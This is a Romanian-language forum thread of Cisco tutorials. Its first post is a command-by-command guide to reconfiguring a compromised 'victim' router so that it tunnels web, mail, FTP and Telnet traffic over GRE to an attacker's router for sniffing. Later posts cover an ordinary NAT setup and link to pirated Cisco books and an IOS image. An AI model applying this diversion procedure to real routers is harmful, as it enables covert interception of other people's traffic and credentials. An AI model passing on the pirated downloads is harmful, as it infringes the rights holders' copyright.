Jump to content
NullCode

Tutoriale Cisco

Recommended Posts

O sa urmeze o serie de Tutoriale Cisco. Le voi posta in acest thread.

Sa luam un caz concret. La ce va ajuta daca aveti acces la un Router Cisco?!

In primul rand, tot traficul va trece prin acel Router, dar cum ati putea intercepta tot acest trafic, avand in vedere ca nu este langa dvs(altfel am folosi direct un wireshark si am rezolva problema)?!

Pentru asta exista Gre Tunnel.

Ce este acest Gre tunnel?

Pai un tunnel Virtual intre 2 routere.

Generic Routing Encapsulation - Wikipedia, the free encyclopedia

Luam imaginea urmatoare: http://img18.imageshack.us/img18/2343/ciscofun1.jpg

Vrem sa trimitem tot traficul victimei catre routerul nostru, astfel incat noi sa putem intercepta tot traficul.

Avand acces la routerul victimei configuram astfel routerul:

Construim tunnelul Gre pe Routerul Victimei:

conf t //intram in interfata de configurare

interface tunnel0 //facem interfata virtual de tunnel

ip address 192.168.10.1 255.255.255.0 //punem un ip interfetei virtuale

tunnel source e0/0 //spunem de unde pleaca traficul

tunnel destination 80.179.20.55 //si unde se duce

Apoi trebuie sa ii spunem routerului ce informatii sa filtreze:

access-list 101 permit tcp any any eq 443 // facem o regula de acces ce trebuie sa filtreze

access-list 101 permit tcp any any eq 80 // routereul, am hotarat sa primim informatii doar

access-list 101 permit tcp any any eq 21 //daca se primesc pachete pe porturile 80,21,..

access-list 101 permit tcp any any eq 20

access-list 101 permit tcp any any eq 23

access-list 101 permit tcp any any eq 25

access-list 101 permit tcp any any eq 110

Sa va explic a 2a comanda:

access-list 101 permit tcp any any eq 80

Prin aceasta ii spunem sa filtreze doar pachetele TCP ce au orice sursa si se

duc catre orice destinatie, iar portul destinatie este 80.

Aplicam aceasta regula(access-list) pe interfata:

router-map divert-traffic // Cream o regula(o regula pentru a fowarda traficul

match ip address 101 //Spunem sa filtreze dupa acces-list 101

interface Ethernet0/0 //intram in interfata e0/0

ip policy route-map divert-traffic //aplicam regula pe interfata de iesire catre internet

Apoi configuram pe routerul nostrul doar Gre tunnel:

Attacker(config)# interface tunnel0

Attacker(config-if)# ip address 192.168.10.2 255.255.255.0

Attacker(config-if)# tunnel source Ethernet0/0

Attacker(config-if)# tunnel destination 21.199.146.242

Tot ce mai trebuie sa facem este sa ascultam traficul cu un wireshark conectat la router.

  • Upvote 1

Share this post


Link to post
Share on other sites

Sa spune ca avem o retea mare de calculatoare si am vrea sa configuram reteau a.i. toate PC-urile sa iasa cu un sigur IP pe internet.

Vom avea nevoie sa configuram PAT/NAT pe router.

Network address translation - Wikipedia, the free encyclopedia

Tot ce trebuie sa facem este :

configure terminal

ip nat pool RST 170.168.2.1 170.168.2.1 netmask 255.255.255. //facem o lista de adrese alcatuita dintr-un singur IP, acesta fiind IP-ul vizibil pe internet.

interface Ethernet0/0 //intram in interfata(sau portul) cu "fatza" la LAN

ip address 10.1.1.10 255.255.255.0 //ii asignam o adresa IP si o masca

ip nat inside //ii spunem routerului ca acesta este Interiorul retelei

interface Serial0/0//intram in interfata(sau portul) cu "fatza" la internet

ip address 170.168.2.1 255.255.255.0//ii asignam o adresa IP si o masca

ip nat outside //ii spunem routerului ca acesta este exteriorul retelei(internetul)

access-list 1 permit 10.1.1.0 0.0.0.255 //construim o regula pentru a spune ce hosturi pot folosi IP-ul de internet

ip nat inside source list 1 pool RST overload //spunem sa faca overload pe lista de IP-uri precizata mai dvrm

Share this post


Link to post
Share on other sites

Nu e vorba ca nu vreau sa il postez, dar eu nu am invatat CCNA1 apoi CCNA2 etc, am luat o carte in care erau toate si am luat CCNA(tot direct).Pentru emulatoare de IOS(sistemul de operare al routerelor Cisco) ai nevoie de GNS3(gasesti aici http://www.gns3.net/download)

Ia programul: Windows GNS3 v0.6.1 all-in-one (includes Dynamips, Pemu and WinPCAP 4.0.2)

GNS3 vine cu un tutorial de cum sa il folosesti, iti explica foarte bine si foarte clar ce trebuie sa faci pentru a putea emula o retea.

Daca nu gasesti imagini de IOS-uri, da un reply si bag eu unul mai bun pe rapidshare.

Uploadez imediat Cartea dupa care am invatat.

LE: http://rapidshare.com/files/295260947/CCNA.rar.html

In CCNA.rar vei gasi:

cisco_press_ccna_portable_command_guide_2nd_edition.pdf

sybex_cisco_ccna_study_guide_6th_edition_2007.pdf

Pentru CCNA mai mult de atat nu iti trebuie, dar trebuie sa exersezi destul de MULT!

LE2:http://rapidshare.com/files/295263864/c3640-js.bin.html -pentru IOS, cum se foloseste citest in tutorialul de la GNS3. Succes!

Share this post


Link to post
Share on other sites
On 6/9/2017 at 3:01 PM, ramonnst said:

Salut

 

Daca va intereseaza tutoriale Cisco gasiti mai jos: ;)

 

[1] https://www.youtube.com/channel/UCVJZsdei_i2G3ZimBzqcmeg

[2] https://ramonnastase.ro

 

Spor la treaba !

tutoriale interesante, baiat isteț, spider tata de ce ii dai dislike la baiat ? (am o curiozatate, ce rau a vrut sa ne faca) ?

  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...